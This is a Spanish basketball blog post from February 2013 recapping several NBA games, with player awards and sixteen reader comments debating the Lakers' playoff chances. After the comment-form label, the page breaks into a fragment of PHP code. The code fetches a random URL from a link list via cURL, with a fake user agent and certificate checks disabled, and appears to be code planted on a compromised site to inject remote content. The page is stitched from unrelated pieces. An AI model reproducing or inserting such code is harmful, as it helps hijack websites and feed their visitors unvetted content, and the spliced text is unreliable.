La Crónica: Oportunidades perdidas

26 de February de 2013 por Simon

La temporada regular se va acercando a su fase decisiva. Apenas falta un mes y medio para el final de la liga regular y hay todavía muchas incógnitas que nos quedan por resolver. Ayer entraban en liza tres equipos que se están jugando la clasificación para Play Off y los tres desaprovecharon oportunidades de oro para acercarse o distanciarse, según corresponda, de sus más inmediatos rivales.

En la conferencia Oeste, el duelo a tres bandas que se va a dar hasta el final de la regular entre Houston Rockets, Utah Jazz y Los Angeles Lakers se saldó anoche con dos derrotas para estos dos últimos. Houston no jugó ayer. Los de Tyrone Corbin cayeron tras una prórroga ante Boston Celtics (110-107) y no aprovecharon la derrota que había sufrido Lakers para distanciarse un poco más. Jazz y Celtics jugaron un partido entretenido con ambos equipos encestando y anotando a buen ritmo y muy igualado. Las ventajas solo superaron los 5 puntos de diferencia al final del tercer cuarto para Boston pero el partido llegó totalmente iguladado a los minutos finales. Pierce tuvo un último ataque para anotarse la victoria de su equipo pero erró el tiro ante una buena defensa de DeMarre Carroll. Ya en la prórroga, Paul Pierce no dio ninguna opción a los Jazz y con 6 puntos consecutivos distanció de forma definitiva a los verdes. Aún así, Foye tuvo un último lanzamiento a la desesperada que no tocó aro. Paul Pierce terminó con 26 puntos y 8 rebotes. En Utah Gordon Hayward logró también 26 puntos.  

Denver Nuggets cortó la racha de 3 victorias seguidas que llevaba Lakers tras la muerte de su propietario Jerry Buss (108-119). El Pepsi Center es un lugar complicado para sumar victorias, como es conocido por todos. Las condiciones de altura de la pista unido al ritmo infernal que proponen los Nuggets de George Karl hacen de esta cancha una de las mas inexpugnables de la liga. Las ventajas de los Nuggets pronto superaron la psicológica barrera de los 10 puntos e o incluso llegaron a rozar los 20 de diferencia en el tercer cuarto. Aunque Lakers consiguió recortar diferencias, nunca llegó a inquietar a Denver que parecía en cierto modo jugar con su adversario: cada vez que estos reducían algo la diferencia estos en menos de un minuto la volvían a ampliar con mucha facilidad.  Ante la baja de Gallinari, el mejor anoche fue su sustituto, Wilson Chandler que terminó el partido con 23 puntos. Mención especial para los 14 puntos y 12 asistencias de Iguodala, que tras superar el periodo de adaptación está totalmente aclimatado y cada día más cómodo en el rol que le ha asignado Karl. Por parte de Lakers, Kobe Bryant estuvo inmenso con 29 puntos, 6 rebotes y 9 asistencias, pero estuvo muy sólo, aunque no lo parezca por los buenos números de sus compañeros. Hay que tener en cuenta que ante el juego ofensivo de Denver no es difícil maquillar la estadística. Howard, por ejemplo, aún con buenos números, fue superado siempre por los pívots de los Nuggets. Anoche volvió a dar una clase magistral en el apartado de tiros libres con un 3/14 desde la línea de personal. Entraba dentro de lo normal que Lakers perdiera en Colorado, pero con el poco margen de error que manejan los de Mike D´Antoni más les vale que sean capaces de robar alguno de estos partidos que en principio sería normal que perdieran.

Mucho discutimos durante el fin de semana sobre las opciones de Toronto para llegar a Play Off y todos coincidíamos en lo vital que era el partido de anoche. No dejar escapar victorias en casa era el primer paso para intentar alcanzar a los Bucks. Pues bien, ayer Toronto dio un paso hacia atrás en sus opciones de Play Off cayendo ante Washington (90-84). Gran parte de la culpa de la derrota la tuvo su reciente adquisición Rudy Gay con su 1/11 en tiros que, junto con la diferencia en los tableros, se convirtió en el mayor lunar de Toronto .  Por parte de Washington el mejor fue el rookie Bradley Beal que anotó 20 puntos y consiguió bajar 6 rebotes.  8 jugadores de los Wizards anotaron 8 o más puntos en una victoria colectiva que les da para seguir buscando triunfos en una temporada que ya está acabada para ellos. Da lástima ver tantas “calvas” en el pabellón de los Raptors. Cuando un comprador quiera llevarse el equipo a otra ciudad, todo el mundo se echará las manos a la cabeza y preguntará el porqué… como ha pasado en otras franquicias y ciudades recientemente.

Al Horford lleva seis partidos seguidos superando los 20 puntos y su equipo lo agradece con 5 victorias en esos seis partidos. Solo han caído últimamente ante Miami. Anoche vencieron a los Pistons de Calderón (114-103) y Horford volvió a estar imparable. Terminó el partido con 23 puntos y 22 rebotes, absolutamente brutal.  El partido tuvo poca historia pues siempre mandaron los Hawks en el marcador y a partir del segundo cuarto las diferencias se ampliaron más allá  de los 10 puntos lo que dejó sin opciones a Detroit Pistons.  La racha de los Hawks los deja como cuartos del Este aprovechando las últimas derrotas de Nets y Bulls.

PREMIOS

MVP: El dominicano Al Horford arrasó a los Pistons bajo los tableros con 23 puntos y 22 rebotes.

Rookie: Bradley Beal suma y sigue. De nuevo fue vital en la victoria de los Wizards, esta vez con 20 puntos.

Sorpresa: Y llegó Jonas Jerebko de la nada  anotó 21 puntos. Avery Bradley también estuvo particularmente acertado de cara a canasta con 18 puntos.

Decepción: Rudy Gay restó más que sumó para los Raptors. Acabó el partido con solo 7 puntos con un 1 de 11 en tiro y 5 pérdidas. El 3 de 14 de Dwight Howard en tiros libres también digno de las mejores películas de terror.

Esfuerzo en vano: Una vez más fue Kobe Bryant el que más dio la cara en el partido de los Lakers. Esta vez sus 29 puntos, 6 rebotes y 9 asistencias fueron insuficientes para llevarse la victoria.

Imágenes | AP Photos / Getty Images

Comenta

16 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Derrota esperada para los Lakers en Colorado pero no por ello menos dolorosa para un equipo que tiene que ganar ya todos los partidos que pueda de manera casi desesperada. Dicho esto, Denver es una de las peores pistas para ganar y menos aún en un back-to-back, con los Nuggets corriendo pista arriba y abajo como verdaderos posesos. Un equipo tremendamente físico y profundo el de Denver que sacó pronto de rueda a los mucho más lentos y veteranos Lakers. Por Denver todos bastante bien con gran partido de ataque de Chandler, McGee poniendo tapones en defensa y todos volando al contraataque (sobre todo Brewer, Iguodala y Lawson). Hasta Miller dió algunas de sus clases al poste… ¡Qué difícil es aguantar el ritmo de este equipo! Por los Lakers muy bien Kobe y el resto regular-mal.
    Mención especial para el bueno de Howard que a pesar de sus números sufrió de lo lindo en el partido. Tras anotar sus 2 primeros libres hizo un sonrojante 1/12 desde la línea el resto del partido y McGee le puso varios gorros. Especialmente sonrojante una jugada en la que le roban la bola y se va camino del saque de banda, él se pone a hacer el tonto y mientras Brewer la salva y como no está atento le pasa la bola al lado y ni se entera… resultado 2 puntos de contraataque para Denver. No está implicado ni atento y eso que ha mejorado últimamente. El tiempo se acaba para los de LA.
    Por suerte para LA, los Celtics asaltaron otra cancha difícil en Utah evitando que los Jazz se distanciaran aún más. Los de Boston siguen en su sube y baja y esta vez con un buen Pierce solventaron el partido. Veremos cómo siguen de aquí en adelante.

      Citar

  2. Esteban dice:
    #2

    es increible el entusiasmo que tienen los fans de los LAKERS para que estos entren a PO, cuando sus posibilidades son bajas, y en el mejor mejor de los casos entraran y quedaran 8vos o 7mos, lo que significa un enfrentamiento con los SPURS o el THUNDER en primera ronda, y una casi segura eliminacion

    entrar a PO les salvaria el honor, pero para derribar a esos dos colosos, los lakers deberian demostrar un nivel que no han mostrando en toda la temporada

      Citar

  3. Jose Luis dice:
    #3

    Yo tengo claro que si los Lakers llegan a play-offs, van a ser casi barridos, espero un 4-1. Pero bueno, quién sabe. San Antonio en play-offs siempre flojea (aunque no suele ser en 1ª ronda), y los Thunder tienen un equipo al que los Lakers pueden dar guerra. Distinto sería Clippers, ahí creo que se llevarían quizá hasta un 4-0.

    Como aficionado Laker, nuestro techo está en segunda ronda (o final de conferencia si se encuentran con Memphis, ¿no veis a estos Lakers eliminando a estos Memphis?), pero de llegar a la primera ronda, hay un 95% de opciones de no pasar de ahí, lo tengo claro.

      Citar

  4. Chipi dice:
    #4

    Yo no me atrevería a decir nunca que nadie va a barrer a un equipo donde esté Bryant. Que es posible que lo hagan, sí, pero que pregunten a Spurs y Thunders si prefieren a los Jazz o a los Lakers.

      Citar

  5. GreenPride dice:
    #5

    Hombre Chipi hace un par de años un equipo con Bryant se llevó un 4-0 de los Mavs y con ventaja de campo así que….. De todas formas yo que no soy ni simpatizante de Lakers les quiero en PO porque creo que pueden dar más guerra en una eliminatoria a 7 partidos que los Jazz por poner un ejemplo. Otra cosa es que puedan ganarla, pero quiero verles ahí.

      Citar

  6. Esteban dice:
    #6

    Jose Luis:
    Yo tengo claro que si los Lakers llegan a play-offs, van a ser casi barridos, espero un 4-1. Pero bueno, quién sabe. San Antonio en play-offs siempre flojea (aunque no suele ser en 1ª ronda), y los Thunder tienen un equipo al que los Lakers pueden dar guerra. Distinto sería Clippers, ahí creo que se llevarían quizá hasta un 4-0.

    Como aficionado Laker, nuestro techo está en segunda ronda (o final de conferencia si se encuentran con Memphis, ¿no veis a estos Lakers eliminando a estos Memphis?), pero de llegar a la primera ronda, hay un 95% de opciones de no pasar de ahí, lo tengo claro.

    claro que los lakers algo mejorados y con pau, pueden eliminar a menphis, warriors o incluso denver, sucede que simplemente no van a tener la oportunidad de cruzarse y poder eliminar a rstos equipos

    como dije, no hay dudas que se cruzaran en primera ronda con los spurs o el thunder, y mas alla del “potencial” de los lakers, estos no han jugado bien en toda la temporada y se enfrentarian a equipos que han sido arrolladores, con los dos de los tres maximos registros de la liga

    que pueda pasar que los lakers logran ganar esa eliminatoria, no puede descontarse, pero tambien hay que reconocer que las apuestos estan 10-1

      Citar

  7. Denise dice:
    #7

    Como ya dije cuando analicé el calendario de Lakers y Jazz, el calendario de Marzo es muyyyy favorable para Lakers. Pronostico que en ese mes le van a recortar juegos de distancia y van a llegar a principios de abril mas o menos empatados.

    Y después…Playoffs es otro mundo y yo no me atreveria a decir que un equipo con Nash, Kobe, Pau y DH vayan a ser barridos a pesar de la decepcionante campla que llevan. Tampoco han tenido muchas ocasiones de jugar los 4 juntos al 100% fisicamente y quizasesto ocurra en Playofffs y ya veremos que cara muestran.

      Citar

  8. Esteban dice:
    #8

    Denise:
    Como ya dije cuando analicé el calendario de Lakers y Jazz, el calendario de Marzo es muyyyy favorable para Lakers. Pronostico que en ese mes le van a recortar juegos de distancia y van a llegar a principios de abril mas o menos empatados.

    Y después…Playoffs es otro mundo y yo no me atreveria a decir que un equipo con Nash, Kobe, Pau y DH vayan a ser barridos a pesar de la decepcionante campla que llevan. Tampoco han tenido muchas ocasiones de jugar los 4 juntos al 100% fisicamente y quizasesto ocurra en Playofffs y ya veremos que cara muestran.

    bueno nadie se atrevia a decir a principio de temporada que un equipo con Nash, Kobe, Pau y DH no iba a estar entre el 1 o 2 mejores equipos del oeste, y aqui estamos, luego de mas de 50 partidos penando por llegar al octavo lugar

    como dije, nadie da por muertos a los lakers, pero las probabilidades en po, seamos sinceros son de 1-10

      Citar

  9. Simon dice:
    #9

    Yo solo digo una cosa: Si Lakers se mete a Play Off como 8º ese mismo día les meto 20 eurillos a que son finalistas del Oeste … Si pasan San Antonio, no los veo perdiendo ni con Memphis ni Denver a 7 partidos…
    Por probar…seguro que se pagaría una cuota muy muy buena y podría llevarme una buena pasta. y si pierdo pues otra vez será…

      Citar

  10. Denise dice:
    #10

    Si los Lakers son 8º y Spurs 1º…cuando se enfrenten en Playoffs, no valdrá para nada todo lo hecho durante la Temporada Regular.
    Y fijate si valoro a Lakers o infravaloro a San Antonio, que vería la eliminatoria a un 50-50

      Citar

  11. Zukuo dice:
    #11

    Yo creo que Lakers va a sudar la gota gorda para meterse en Play off, y que si les toca Thunder están fuera pero pienso que a Spurs les ganan 4-1 ó 4-2 sin sufrir mucho vamos, y una vez ahi llegan a final de conferencia pero nada más, pero viendo como ha ido todo el año, no será mal resultado.

      Citar

  12. Jose Luis dice:
    #12

    Es que San Antonio en PO siempre baja bastantes enteros. Aún así, su plantilla es profunda y joven excluyendo a Duncan-Ginóbili-Jackson, y podrían correr bastante. Al 50% no, porque además Pop puede darle un increíble baño a D’Antoni. Pero bueno, jugando los 4 juntos, la eliminatoria puede estar 65-35 a favor de San Antonio.

      Citar

  13. Chipi dice:
    #13

    Es que para mí Spurs y Lakers son iguales. Quiero decir, en el caso opuesto, que Lakers fuese 1º de conferencia y Spurs 8º, tampoco daría un favorito claro. Nunca vas a saber si Kobe, Duncan o Parker van a hacer una serie estratosférica de las suyas, con 35 ppp o 15 asistencias. Y esta sensación la tengo con muy pocos jugadores. Eso sí, como dice Jose Luis, Pop Vs D’antoni sí que es una barrida clara.

      Citar

  14. Jose Luis dice:
    #14

    Han rescindido la técnica de ayer de Kobe, dando a entender que merecía los tres tiros libres. Tiene 13, a las 16 se perderá un partido.

      Citar

  15. nba dice:
    #15

    En el hipotetico y remoto caso de que los Lakers lleguen a playoffs, de quien dependera que sean barridos o no , será de Howard , ya que no se si Kobe conseguira poner firmes a sus compañeros en el caso de que lleguen.
    Porque la verdad, que D’antoni es uno de los peores sino el peor de los entrenadores en el Oeste que tienen aspiraciones de que sus equipos entren en playoffs

      Citar

  16. Esteban dice:
    #16

    nba:
    En el hipotetico y remoto caso de que los Lakers lleguen a playoffs, de quien dependera que sean barridos o no , será de Howard , ya que no se si Kobe conseguira poner firmes a sus compañeros en el caso de que lleguen.
    Porque la verdad, que D’antoni es uno de los peores sino el peor de los entrenadores en el Oeste que tienen aspiraciones de que sus equipos entren en playoffs

    yo diria que es el peor entrenador de la NBA

    un equipo con
    nash-kobe-metta-pau-howard
    y un banco con blake-meeks-eubanks-jamison-clark

    es un plantel de coña para campeon, el maestro zen con estos mimbres le gana a los lakers del 2001

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>